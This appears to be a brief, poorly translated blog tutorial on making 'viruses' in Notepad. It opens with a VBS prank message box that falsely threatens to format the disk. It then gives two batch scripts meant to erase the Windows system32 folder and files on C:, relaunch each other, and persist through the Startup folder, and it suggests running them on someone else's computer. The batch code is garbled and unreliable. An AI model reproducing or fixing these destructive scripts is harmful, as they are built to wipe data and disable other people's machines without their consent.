how to make a virus with notepad

Creating a virus? Dangerous or not? Of course dangerous virus, but this tutorial will discuss how to create a simple virus from the least hazardous, dangerous to

Steps

1. Open Notepad
2. Copy the code below


lol=msgbox ("Warning a virus has been detected on your PC. Press YES to format your hard disk now or press NO to format your hard disk after system reboot",20,"Warning")

3. Save with format. Vbs (ex: virus1.vbs). Save the also with format an all file
4. Run His virus
5. Will appear choice yes or no. Select alone one of one (Yes or No.). Not will happen
 
Note: Messages that appear can be changed. And if you like the program is activated when the computer startup, put the program in C: \ Documents and Settings \ * username * \ Start Menu \ Programs \ Startup.
 
Simple Batch Virus

Viruses that time is quite dangerous, but not damaging. If you want to try, please try it on another computer, not on a personal computer.
Steps

1. Open Notepad
2. Copy the code below
 
Virus detected / / Title for the window
xxx / / sub scripts xxx
msg * try to delete viruz / / message
erase "C: \ WINDOWS \ system32" / / delete system32
xxxx.bat start / / running xxxx.bat files that are stored on the same folder
msg * experiment failed, try again / / message
goto xxxx / / execution xxxx.bat
 

 

3. Save with xxx.bat name (Make all files, not. Txt)
4. Open Notepad (Notepad new)
5. Copy the code below

Viruz / / change window title
msg * wah2 your computer got viruz / / message in the message box
del / / Delete files / / / "del c:" delete the file in c:
erase / / same kyk del
xxxx.bat start / / start xxxx.bat
xxx / / sub scripts
goto / / to the subscript
 
6. Save with xxxx.bat name (Make all files,, save in the same folder with the file first)
7. If you want to run it, run the xxxx.bat
8. If you want to run when the computer Startup Copy to C: \ Documents and Settings \ * user name * \ Start Menu \ Programs \ Startup.
 

0 Response to "how to make a virus with notepad"